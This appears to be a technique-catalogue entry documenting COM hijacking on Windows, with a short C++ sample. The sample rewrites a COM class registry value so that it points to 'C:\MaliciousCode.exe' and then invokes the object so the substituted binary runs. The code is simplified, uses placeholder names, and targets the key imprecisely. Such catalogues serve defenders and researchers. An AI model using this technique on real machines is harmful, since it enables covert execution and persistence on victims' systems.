Windows C++ / COM Hijacking
| Author | Thomas Roccia (fr0gger) |
| Platform | Windows |
| Language | C++ |
| Technique | COM Hijacking |
Description:
This code opens the relevant key in the Windows Registry and modifies the value to point to the path of the malicious executable. When the COM object is used, it will execute the malicious code instead of the legitimate system component.
Code
#include <Windows.h>
#include <atlbase.h>
int main()
{
// Modify the Windows Registry to replace the reference to a legitimate system component with the path to the malicious executable
HKEY hKey;
LONG lResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Classes\\MyCOMObject", 0, KEY_WRITE, &hKey);
if (lResult == ERROR_SUCCESS)
{
RegSetValueEx(hKey, "", 0, REG_SZ, (BYTE*)"C:\\MaliciousCode.exe", sizeof("C:\\MaliciousCode.exe"));
RegCloseKey(hKey);
}
// Use the COM object as normal
CComPtr<IMyCOMObject> pMyCOMObject;
HRESULT hr = pMyCOMObject.CoCreateInstance(__uuidof(MyCOMObject));
if (SUCCEEDED(hr))
{
// When the COM object is executed, the malicious code will be run instead of the legitimate system component
pMyCOMObject->DoSomething();
}
return 0;
}Created
December 29, 2022
Last Revised
April 22, 2024